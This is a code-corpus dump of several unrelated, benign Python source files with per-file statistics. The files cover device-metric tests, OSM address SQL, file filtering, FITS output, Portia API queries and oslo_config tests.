ts=cmd.ts,
seq=12,
device_type="server",
data_type="metric",
metric_value=types_gen.KeyValue(key=cmd.cmd, float_value=1.0),
labels=[
types_gen.KeyValue(
key="test-label", value="test-float-value"),
types_gen.KeyValue(key="pick_id", value=cmd.pick_id),
types_gen.KeyValue(key="intent", value="pick")
],
event_params=[
types_gen.KeyValue(
key="test-event", value="test-float-value")
],
),
types_gen.DeviceData(
ts=cmd.ts,
seq=13,
device_type="server",
data_type="metric",
metric_value=types_gen.KeyValue(key=cmd.cmd, float_value=2.0),
labels=[
types_gen.KeyValue(key="test-label", value="test-kitting"),
types_gen.KeyValue(key="pick_id", value=cmd.pick_id),
types_gen.KeyValue(key="intent", value="kitting")
],
event_params=[
types_gen.KeyValue(key="test-event", value="test-kitting")
],
),
]
return []
def start(self) -> List[types_gen.DeviceData]:
return []
if __name__ == "__main__":
unittest.main()
| 44.107056
| 94
| 0.589089
| 2,065
| 18,128
| 4.907506
| 0.083293
| 0.052694
| 0.047365
| 0.056246
| 0.859384
| 0.845767
| 0.820604
| 0.789027
| 0.775706
| 0.773732
| 0
| 0.016678
| 0.29551
| 18,128
| 410
| 95
| 44.214634
| 0.776838
| 0.038008
| 0
| 0.75
| 0
| 0
| 0.122624
| 0.039056
| 0
| 0
| 0
| 0
| 0.137363
| 1
| 0.027473
| false
| 0
| 0.019231
| 0.002747
| 0.065934
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f839b0d3b36721d9dc5c319b6dd15a05642ec933
| 23
|
py
|
Python
|
nixml/__init__.py
|
moredhel/nixml
|
2c3d2a836d7a0060371597b8e95edf2b74af6018
|
[
"MIT"
] | 58
|
2019-03-12T16:51:11.000Z
|
2022-02-08T23:26:19.000Z
|
nixml/__init__.py
|
moredhel/nixml
|
2c3d2a836d7a0060371597b8e95edf2b74af6018
|
[
"MIT"
] | 1
|
2020-03-13T05:37:01.000Z
|
2020-03-13T09:21:06.000Z
|
nixml/__init__.py
|
moredhel/nixml
|
2c3d2a836d7a0060371597b8e95edf2b74af6018
|
[
"MIT"
] | 4
|
2019-07-31T17:07:59.000Z
|
2022-03-14T11:19:57.000Z
|
from . import generate
| 11.5
| 22
| 0.782609
| 3
| 23
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 23
| 1
| 23
| 23
| 0.947368
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f8622db6be3831b4bdae72807c7f9508641f3664
| 4,315
|
py
|
Python
|
query.py
|
jendrusk/osm_report_addr
|
315dc6aba8d881a97e15badabf27643ec058a440
|
[
"MIT"
] | 1
|
2018-07-10T10:32:14.000Z
|
2018-07-10T10:32:14.000Z
|
query.py
|
jendrusk/osm_report_addr
|
315dc6aba8d881a97e15badabf27643ec058a440
|
[
"MIT"
] | 5
|
2018-07-10T10:36:15.000Z
|
2018-08-30T11:44:51.000Z
|
query.py
|
jendrusk/osm_report_addr
|
315dc6aba8d881a97e15badabf27643ec058a440
|
[
"MIT"
] | 1
|
2018-07-10T07:58:59.000Z
|
2018-07-10T07:58:59.000Z
|
# #SQL Wyciągający błędy z bazy
# rep_street_sql = """
# select
# tags -> 'osm_user' as user,
# tags -> 'osm_changeset' as changeset,
# tags -> 'osm_timestamp' as created,
# osm_id,
# case
# when po."addr:city" is not null and po."addr:place" is not null and po."addr:street" is not null then 'c_p_s'::text
# when po."addr:city" is null and po."addr:place" is not null and po."addr:street" is not null then 'nc_p_s'::text
# when po."addr:city" is null and po."addr:place" is null and po."addr:street" is not null then 'nc_np_s'::text
# when po."addr:city" is not null and po."addr:place" is not null and po."addr:street" is null then 'c_p_ns'::text
# when po."addr:city" is not null and po."addr:place" is null and po."addr:street" is null then 'c_np_ns'::text
# when po."addr:city" is null and po."addr:place" is null and po."addr:street" is null then 'nc_np_ns'::text
# else null::text
# end as reason,
# 'node' as type,
# tags -> 'osm_version' as version,
# ST_Y(ST_Transform(way,4326)) as lat,
# ST_X(ST_Transform(way,4326)) as lon
# from planet_osm_point po
# where po."addr:housenumber" is not null
# and (po.tags->'osm_timestamp')::timestamp at time zone '0:00' between (date_trunc('hour',current_timestamp) - interval '24 hour')::timestamp and current_timestamp::timestamp
# and aba_isinpoland(po.way) = true
# and (
# (po."addr:city" is not null and po."addr:place" is not null and po."addr:street" is not null) or
# (po."addr:city" is null and po."addr:place" is not null and po."addr:street" is not null) or
# (po."addr:city" is null and po."addr:place" is null and po."addr:street" is not null) or
# (po."addr:city" is not null and po."addr:place" is not null and po."addr:street" is null) or
# (po."addr:city" is not null and po."addr:place" is null and po."addr:street" is null) or
# (po."addr:city" is null and po."addr:place" is null and po."addr:street" is null)
# )
# union all
# select
# tags -> 'osm_user' as user,
# tags -> 'osm_changeset' as changeset,
# tags -> 'osm_timestamp' as created,
# osm_id,
# case
# when po."addr:city" is not null and po."addr:place" is not null and po."addr:street" is not null then 'c_p_s'::text
# when po."addr:city" is null and po."addr:place" is not null and po."addr:street" is not null then 'nc_p_s'::text
# when po."addr:city" is null and po."addr:place" is null and po."addr:street" is not null then 'nc_np_s'::text
# when po."addr:city" is not null and po."addr:place" is not null and po."addr:street" is null then 'c_p_ns'::text
# when po."addr:city" is not null and po."addr:place" is null and po."addr:street" is null then 'c_np_ns'::text
# when po."addr:city" is null and po."addr:place" is null and po."addr:street" is null then 'nc_np_ns'::text
# else null::text
# end
# as reason,
# case
# when osm_id > 0 then 'way'
# when osm_id < 0 then 'relation'
# end
# as type,
# tags -> 'osm_version' as version,
# ST_Y(ST_Transform(ST_Centroid(way),4326)) as lat,
# ST_X(ST_Transform(ST_Centroid(way),4326)) as lon
# from planet_osm_polygon po
# where po."addr:housenumber" is not null
# and (po.tags->'osm_timestamp')::timestamp at time zone '0:00' between (date_trunc('hour',current_timestamp) - interval '24 hour')::timestamp and current_timestamp::timestamp
# and aba_isinpoland(po.way) = true
# and (
# (po."addr:city" is not null and po."addr:place" is not null and po."addr:street" is not null) or
# (po."addr:city" is null and po."addr:place" is not null and po."addr:street" is not null) or
# (po."addr:city" is null and po."addr:place" is null and po."addr:street" is not null) or
# (po."addr:city" is not null and po."addr:place" is not null and po."addr:street" is null) or
# (po."addr:city" is not null and po."addr:place" is null and po."addr:street" is null) or
# (po."addr:city" is null and po."addr:place" is null and po."addr:street" is null)
# )
# """
# SQL idzie długo więc zrobiłem tabelę tymczasową do developmentu
rep_street_sql = "select * from tmp_rep_test"
| 59.109589
| 178
| 0.638934
| 756
| 4,315
| 3.559524
| 0.111111
| 0.164994
| 0.167224
| 0.231884
| 0.938685
| 0.928279
| 0.928279
| 0.902267
| 0.882943
| 0.882943
| 0
| 0.008346
| 0.22248
| 4,315
| 72
| 179
| 59.930556
| 0.793741
| 0.956199
| 0
| 0
| 0
| 0
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f868f7a10a7740960a5bf2dda47a1c14f7814197
| 239
|
py
|
Python
|
tests/test_numeric.py
|
IshitaTakeshi/Tadataka
|
852c7afb904503005e51884408e1492ef0be836f
|
[
"Apache-2.0"
] | 54
|
2019-11-15T16:30:34.000Z
|
2022-01-13T15:18:54.000Z
|
tests/test_numeric.py
|
IshitaTakeshi/Tadataka
|
852c7afb904503005e51884408e1492ef0be836f
|
[
"Apache-2.0"
] | 11
|
2019-02-28T08:28:24.000Z
|
2020-04-07T04:47:12.000Z
|
tests/test_numeric.py
|
IshitaTakeshi/Tadataka
|
852c7afb904503005e51884408e1492ef0be836f
|
[
"Apache-2.0"
] | 1
|
2020-02-26T13:59:40.000Z
|
2020-02-26T13:59:40.000Z
|
from numpy.testing import assert_almost_equal
from tadataka.numeric import safe_invert
def test_safe_invert():
assert_almost_equal(safe_invert(10.0, epsilon=1e-17), 0.1)
assert_almost_equal(safe_invert(0.0, epsilon=1e-17), 1e17)
| 29.875
| 62
| 0.790795
| 40
| 239
| 4.45
| 0.5
| 0.224719
| 0.286517
| 0.235955
| 0.303371
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075117
| 0.108787
| 239
| 7
| 63
| 34.142857
| 0.760563
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.6
| 1
| 0.2
| true
| 0
| 0.4
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f89d8caee8e46aa9ab1154c4b52e36f8d7f7f956
| 138
|
py
|
Python
|
ATIVI01.py
|
kauaas/ATIVIDADE-DE-PYTHON-N3
|
c596f866f9b825ceb7e330317a018e1740187df4
|
[
"Apache-2.0"
] | null | null | null |
ATIVI01.py
|
kauaas/ATIVIDADE-DE-PYTHON-N3
|
c596f866f9b825ceb7e330317a018e1740187df4
|
[
"Apache-2.0"
] | null | null | null |
ATIVI01.py
|
kauaas/ATIVIDADE-DE-PYTHON-N3
|
c596f866f9b825ceb7e330317a018e1740187df4
|
[
"Apache-2.0"
] | null | null | null |
nota = float(input('Informe uma nota de 0 a 10: '))
while (Nota>10) or (Nota<0):
Nota = float(input('Informe uma nota de 0 a 10: '))
| 27.6
| 55
| 0.623188
| 26
| 138
| 3.307692
| 0.423077
| 0.209302
| 0.325581
| 0.488372
| 0.790698
| 0.790698
| 0.790698
| 0.790698
| 0.790698
| 0.790698
| 0
| 0.082569
| 0.210145
| 138
| 4
| 56
| 34.5
| 0.706422
| 0
| 0
| 0
| 0
| 0
| 0.405797
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
3e0611bb54ea2a231c8b985646eb957721167841
| 381
|
py
|
Python
|
statistics/files.py
|
niilohlin/objective-tools
|
377423ebd172f407800217a9743e78d739bd4786
|
[
"MIT"
] | null | null | null |
statistics/files.py
|
niilohlin/objective-tools
|
377423ebd172f407800217a9743e78d739bd4786
|
[
"MIT"
] | null | null | null |
statistics/files.py
|
niilohlin/objective-tools
|
377423ebd172f407800217a9743e78d739bd4786
|
[
"MIT"
] | null | null | null |
import os
def headers(directory="./"):
files = os.listdir(directory)
return filter(lambda f: f.endswith(".h"), files)
def bodies(directory="./"):
files = os.listdir(directory)
return filter(lambda f: f.endswith(".m"), files)
def allFiles(directory="./"):
files = os.listdir(directory)
return filter(lambda f: f.endswith(".m") or f.endswith(".h"), files)
| 27.214286
| 72
| 0.650919
| 51
| 381
| 4.862745
| 0.333333
| 0.145161
| 0.193548
| 0.278226
| 0.733871
| 0.733871
| 0.733871
| 0.733871
| 0.733871
| 0.733871
| 0
| 0
| 0.160105
| 381
| 13
| 73
| 29.307692
| 0.775
| 0
| 0
| 0.3
| 0
| 0
| 0.036745
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.3
| false
| 0
| 0.1
| 0
| 0.7
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
3e3d2b515884a848a95c7f0983807ecffb7b1344
| 564
|
py
|
Python
|
codes/write_files.py
|
Wenupi/protoplanetary_disks
|
51f8decbec5415e1da9893316f03d32ca5ab27de
|
[
"MIT"
] | null | null | null |
codes/write_files.py
|
Wenupi/protoplanetary_disks
|
51f8decbec5415e1da9893316f03d32ca5ab27de
|
[
"MIT"
] | null | null | null |
codes/write_files.py
|
Wenupi/protoplanetary_disks
|
51f8decbec5415e1da9893316f03d32ca5ab27de
|
[
"MIT"
] | null | null | null |
from astropy.io import fits
fits.writeto('Results/fits/Intensity_wl'+str(np.round(wl,2))+'_inc'+str(np.round(inc*180./np.pi,2))+'deg.fits',
Bright, overwrite=True)
print (' - Results/fits/Intensity_wl'+str(np.round(wl,2))+'_inc'+str(np.round(inc*180./np.pi,2))+'deg.fits saved!')
fits.writeto('Results/fits/OpticalD_wl'+str(np.round(wl,2))+'_inc'+str(np.round(inc*180./np.pi,2))+'deg.fits',
op_depth, overwrite=True)
print (' - Results/fits/OpticalD_wl'+str(np.round(wl,2))+'_inc'+str(np.round(inc*180./np.pi,2))+'deg.fits saved!')
| 56.4
| 117
| 0.664894
| 100
| 564
| 3.66
| 0.25
| 0.10929
| 0.218579
| 0.131148
| 0.84153
| 0.743169
| 0.743169
| 0.743169
| 0.743169
| 0.743169
| 0
| 0.039063
| 0.092199
| 564
| 9
| 118
| 62.666667
| 0.675781
| 0
| 0
| 0
| 0
| 0
| 0.301418
| 0.173759
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.142857
| 0
| 0.142857
| 0.285714
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
3e4b51664925ee5a313b604f2e1ae62dbce59e23
| 5,465
|
py
|
Python
|
portiapy/select.py
|
AgrinessEdgeIoT/portiapy
|
efc5e4af2d94c57aa03b447ee015755532baaf70
|
[
"MIT"
] | 1
|
2019-05-22T18:38:01.000Z
|
2019-05-22T18:38:01.000Z
|
portiapy/select.py
|
AgrinessEdgeIoT/portiapy
|
efc5e4af2d94c57aa03b447ee015755532baaf70
|
[
"MIT"
] | 4
|
2018-09-17T13:16:18.000Z
|
2021-02-26T13:30:49.000Z
|
portiapy/select.py
|
AgrinessEdgeIoT/portiapy
|
efc5e4af2d94c57aa03b447ee015755532baaf70
|
[
"MIT"
] | null | null | null |
"""Select tools to fetch a device's data based on its ports, sensors and dimensions.
"""
import portiapy.utils as utils
def query_by_port_sensor(
portia_config: dict,
edge_id: str,
port: int,
sensor: int,
last: bool=False,
params: dict={
'from': None,
'to': None,
'lower_bound': None,
'upper_bound': None,
'order': None,
'limit': None,
'precision': 'ms',
'timezone': 'Etc/UTC'
}) -> object:
"""Retrieves a device's series by its port and sensor.
Arguments:
portia_config {dict} -- Portia's configuration arguments
edge_id {str} -- Edge ID that identifies the device
port {int} -- port of the device
sensor {int} -- sensor of the device
Keyword Arguments:
last {bool} -- if the last package should be returned or not
(default: {False})
params {dict} -- params to send to the service (default: {{ 'from',
'to', 'order', 'lower_bound', 'upper_bound', 'order',
'limit', 'precision': 'ms', 'timezone': 'Etc/UTC' }})
Returns:
object -- object with the device's dimensions
"""
accept_header = portia_config.get('Accept')
if accept_header is None:
accept_header = 'text/csv'
header = {'Accept': accept_header}
if last == False:
endpoint = '/select/device/{0}/port/{1}/sensor/{2}'.format(
edge_id, port, sensor
)
else:
endpoint = '/select/device/{0}/port/{1}/sensor/{2}/last'.format(
edge_id, port, sensor
)
response = utils.http_get_request(
portia_config, endpoint, params=params, optional_headers=header
)
return utils.convert(accept_header, portia_config, response)
def query_by_port_dimension(
portia_config: dict,
edge_id: str,
port: int,
dimension_code: int,
last: bool=False,
params: dict={
'from': None,
'to': None,
'lower_bound': None,
'upper_bound': None,
'order': None,
'limit': None,
'precision': 'ms',
'timezone': 'Etc/UTC'
}) -> object:
"""Retrieves a device's series by its port and dimension code.
Arguments:
portia_config {dict} -- Portia's configuration arguments
edge_id {str} -- Edge ID that identifies the device
port {int} -- port of the device
dimension_code {int} -- dimension code of the device
Keyword Arguments:
last {bool} -- if the last package should be returned or not
(default: {False})
params {dict} -- params to send to the service (default: {{ 'from',
'to', 'order', 'lower_bound', 'upper_bound', 'order',
'limit', 'precision': 'ms', 'timezone': 'Etc/UTC' }})
Returns:
object -- object with the device's dimensions
"""
accept_header = portia_config.get('Accept')
if accept_header is None:
accept_header = 'text/csv'
header = {'Accept': accept_header}
if last == False:
endpoint = '/select/device/{0}/port/{1}/dimension/{2}'.format(
edge_id, port, dimension_code
)
else:
endpoint = '/select/device/{0}/port/{1}/dimension/{2}/last'.format(
edge_id, port, dimension_code
)
response = utils.http_get_request(
portia_config, endpoint, params=params, optional_headers=header
)
return utils.convert(accept_header, portia_config, response)
def query_by_port_sensor_dimension(
portia_config: dict,
edge_id: str,
port: int,
sensor: int,
dimension_code: int,
last: bool=False,
params: dict={
'from': None,
'to': None,
'lower_bound': None,
'upper_bound': None,
'order': None,
'limit': None,
'precision': 'ms',
'timezone': 'Etc/UTC'
}) -> object:
"""Retrieves a device's series by its port, sensor and dimension code.
Arguments:
portia_config {dict} -- Portia's configuration arguments
edge_id {str} -- Edge ID that identifies the device
port {int} -- port of the device
sensor {int} -- sensor of the device
dimension_code {int} -- dimension code of the device
Keyword Arguments:
last {bool} -- if the last package should be returned or not
(default: {False})
params {dict} -- params to send to the service (default: {{ 'from',
'to', 'order', 'lower_bound', 'upper_bound', 'order',
'limit', 'precision': 'ms', 'timezone': 'Etc/UTC' }})
Returns:
object -- object with the device's dimensions
"""
accept_header = portia_config.get('Accept')
if accept_header is None:
accept_header = 'text/csv'
header = {'Accept': accept_header}
if last == False:
endpoint = '/select/device/{0}/port/{1}/sensor/{2}/dimension/{3}' \
.format(edge_id, port, sensor, dimension_code)
else:
endpoint = ('/select/device/{0}/port/{1}/sensor/{2}/dimension/{3}'
'/last'.format(edge_id, port, sensor, dimension_code))
response = utils.http_get_request(
portia_config, endpoint, params=params, optional_headers=header
)
return utils.convert(accept_header, portia_config, response)
| 31.051136
| 84
| 0.576212
| 636
| 5,465
| 4.823899
| 0.143082
| 0.05867
| 0.025098
| 0.043025
| 0.966428
| 0.950782
| 0.92927
| 0.914928
| 0.908409
| 0.861473
| 0
| 0.005215
| 0.298262
| 5,465
| 175
| 85
| 31.228571
| 0.794785
| 0.397072
| 0
| 0.802083
| 0
| 0
| 0.172088
| 0.088484
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03125
| false
| 0
| 0.010417
| 0
| 0.072917
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3e7b2eeb4b8367281ab7a6d043f490fc6b37cdae
| 42
|
py
|
Python
|
src/utils/__init__.py
|
UoE-TTDS/project
|
9e98bcab6d561038aea6a987c44211c98068bfed
|
[
"MIT"
] | null | null | null |
src/utils/__init__.py
|
UoE-TTDS/project
|
9e98bcab6d561038aea6a987c44211c98068bfed
|
[
"MIT"
] | null | null | null |
src/utils/__init__.py
|
UoE-TTDS/project
|
9e98bcab6d561038aea6a987c44211c98068bfed
|
[
"MIT"
] | null | null | null |
from .generate_dataset import get_dataset
| 21
| 41
| 0.880952
| 6
| 42
| 5.833333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 42
| 1
| 42
| 42
| 0.921053
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e44555ccfd85df76a00187780bdcea978c7a55a9
| 145
|
py
|
Python
|
owstk/analysis/__init__.py
|
Tfitzpatrick846/OWSTK
|
dfce0fad56c0093c2c9cf45952cb3a0958e94706
|
[
"CNRI-Python"
] | null | null | null |
owstk/analysis/__init__.py
|
Tfitzpatrick846/OWSTK
|
dfce0fad56c0093c2c9cf45952cb3a0958e94706
|
[
"CNRI-Python"
] | null | null | null |
owstk/analysis/__init__.py
|
Tfitzpatrick846/OWSTK
|
dfce0fad56c0093c2c9cf45952cb3a0958e94706
|
[
"CNRI-Python"
] | null | null | null |
import owstk.analysis.access
import owstk.analysis.orbit
import owstk.analysis.workbench
import owstk.analysis.plot
import owstk.analysis.export
| 24.166667
| 31
| 0.862069
| 20
| 145
| 6.25
| 0.4
| 0.44
| 0.76
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068966
| 145
| 5
| 32
| 29
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e4ddcbaba6800c399c7592ada8a856caf2a4e403
| 5,807
|
py
|
Python
|
venv/lib/python3.6/site-packages/oslo_config/tests/test_sphinxconfiggen.py
|
boogieLing/r0_es
|
14ac336a40c4f87b8bd3bd62a60158b437690c35
|
[
"MIT"
] | 110
|
2015-01-29T20:10:46.000Z
|
2022-03-21T12:29:21.000Z
|
venv/lib/python3.6/site-packages/oslo_config/tests/test_sphinxconfiggen.py
|
boogieLing/r0_es
|
14ac336a40c4f87b8bd3bd62a60158b437690c35
|
[
"MIT"
] | 1
|
2019-03-16T18:35:42.000Z
|
2019-03-16T19:40:14.000Z
|
venv/lib/python3.6/site-packages/oslo_config/tests/test_sphinxconfiggen.py
|
boogieLing/r0_es
|
14ac336a40c4f87b8bd3bd62a60158b437690c35
|
[
"MIT"
] | 115
|
2015-01-14T03:25:05.000Z
|
2021-12-02T16:49:06.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from oslotest import base
from oslo_config import sphinxconfiggen
class SingleSampleGenerationTest(base.BaseTestCase):
@mock.patch('os.path.isdir')
@mock.patch('os.path.isfile')
@mock.patch('oslo_config.generator.main')
def test_sample_gen_with_single_config_file(self, main, isfile, isdir):
isfile.side_effect = [False, True]
isdir.return_value = True
config = mock.Mock(config_generator_config_file='nova-gen.conf',
sample_config_basename='nova')
app = mock.Mock(srcdir='/opt/nova', config=config)
sphinxconfiggen.generate_sample(app)
main.assert_called_once_with(args=['--config-file',
'/opt/nova/nova-gen.conf',
'--output-file',
'/opt/nova/nova.conf.sample'
])
@mock.patch('os.path.isdir')
@mock.patch('os.path.isfile')
@mock.patch('oslo_config.generator.main')
def test_sample_gen_with_single_config_file_no_base(self, main, isfile,
isdir):
isfile.side_effect = [False, True]
isdir.return_value = True
config = mock.Mock(config_generator_config_file='nova-gen.conf',
sample_config_basename=None)
app = mock.Mock(srcdir='/opt/nova', config=config)
sphinxconfiggen.generate_sample(app)
main.assert_called_once_with(args=['--config-file',
'/opt/nova/nova-gen.conf',
'--output-file',
'/opt/nova/sample.config'])
class MultipleSampleGenerationTest(base.BaseTestCase):
@mock.patch('os.path.isdir')
@mock.patch('os.path.isfile')
@mock.patch('oslo_config.generator.main')
def test_multi_sample_gen(self, main, isfile, isdir):
isfile.side_effect = [False, True, False, True]
isdir.return_value = True
multiple_configs = [('glance-api-gen.conf', 'glance-api'),
('glance-reg-gen.conf', 'glance-reg')]
config = mock.Mock(config_generator_config_file=multiple_configs)
app = mock.Mock(srcdir='/opt/glance', config=config)
sphinxconfiggen.generate_sample(app)
self.assertEqual(main.call_count, 2)
main.assert_any_call(args=['--config-file',
'/opt/glance/glance-api-gen.conf',
'--output-file',
'/opt/glance/glance-api.conf.sample'])
main.assert_any_call(args=['--config-file',
'/opt/glance/glance-reg-gen.conf',
'--output-file',
'/opt/glance/glance-reg.conf.sample'])
@mock.patch('os.path.isdir')
@mock.patch('os.path.isfile')
@mock.patch('oslo_config.generator.main')
def test_multi_sample_gen_with_without_one_base(self, main, isfile, isdir):
isfile.side_effect = [False, True, False, True]
isdir.return_value = True
multiple_configs = [('glance-api-gen.conf', 'glance-api'),
('glance-reg-gen.conf', None)]
config = mock.Mock(config_generator_config_file=multiple_configs)
app = mock.Mock(srcdir='/opt/glance', config=config)
sphinxconfiggen.generate_sample(app)
self.assertEqual(main.call_count, 2)
main.assert_any_call(args=['--config-file',
'/opt/glance/glance-api-gen.conf',
'--output-file',
'/opt/glance/glance-api.conf.sample'])
main.assert_any_call(args=['--config-file',
'/opt/glance/glance-reg-gen.conf',
'--output-file',
'/opt/glance/glance-reg-gen.conf.sample'])
@mock.patch('os.path.isdir')
@mock.patch('os.path.isfile')
@mock.patch('oslo_config.generator.main')
def test_multi_sample_gen_with_without_any_base(self, main, isfile, isdir):
isfile.side_effect = [False, True, False, True]
isdir.return_value = True
multiple_configs = [('glance-api-gen.conf', None),
('glance-reg-gen.conf', None)]
config = mock.Mock(config_generator_config_file=multiple_configs)
app = mock.Mock(srcdir='/opt/glance', config=config)
sphinxconfiggen.generate_sample(app)
self.assertEqual(main.call_count, 2)
main.assert_any_call(args=['--config-file',
'/opt/glance/glance-api-gen.conf',
'--output-file',
'/opt/glance/glance-api-gen.conf.sample'])
main.assert_any_call(args=['--config-file',
'/opt/glance/glance-reg-gen.conf',
'--output-file',
'/opt/glance/glance-reg-gen.conf.sample'])
| 45.015504
| 79
| 0.558981
| 639
| 5,807
| 4.926448
| 0.179969
| 0.042249
| 0.049555
| 0.072427
| 0.808132
| 0.808132
| 0.808132
| 0.807179
| 0.807179
| 0.807179
| 0
| 0.001772
| 0.319614
| 5,807
| 128
| 80
| 45.367188
| 0.794989
| 0.094024
| 0
| 0.789474
| 0
| 0
| 0.227793
| 0.11952
| 0
| 0
| 0
| 0
| 0.115789
| 1
| 0.052632
| false
| 0
| 0.031579
| 0
| 0.105263
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
395bc3065f12457f08d18b94a2d602a0788bc67b
| 146
|
py
|
Python
|
fugue/extensions/outputter/__init__.py
|
WangCHX/fugue
|
bb9758d23b0041d4ed00f6195f317d097a9dd683
|
[
"Apache-2.0"
] | null | null | null |
fugue/extensions/outputter/__init__.py
|
WangCHX/fugue
|
bb9758d23b0041d4ed00f6195f317d097a9dd683
|
[
"Apache-2.0"
] | null | null | null |
fugue/extensions/outputter/__init__.py
|
WangCHX/fugue
|
bb9758d23b0041d4ed00f6195f317d097a9dd683
|
[
"Apache-2.0"
] | null | null | null |
# flake8: noqa
from fugue.extensions.outputter.outputter import Outputter
from fugue.extensions.outputter.convert import outputter, _to_outputter
| 36.5
| 71
| 0.856164
| 18
| 146
| 6.833333
| 0.5
| 0.146341
| 0.308943
| 0.455285
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007463
| 0.082192
| 146
| 3
| 72
| 48.666667
| 0.910448
| 0.082192
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
39be593249dc7069fd70849c65b2b5ba3aa91f91
| 6,409
|
py
|
Python
|
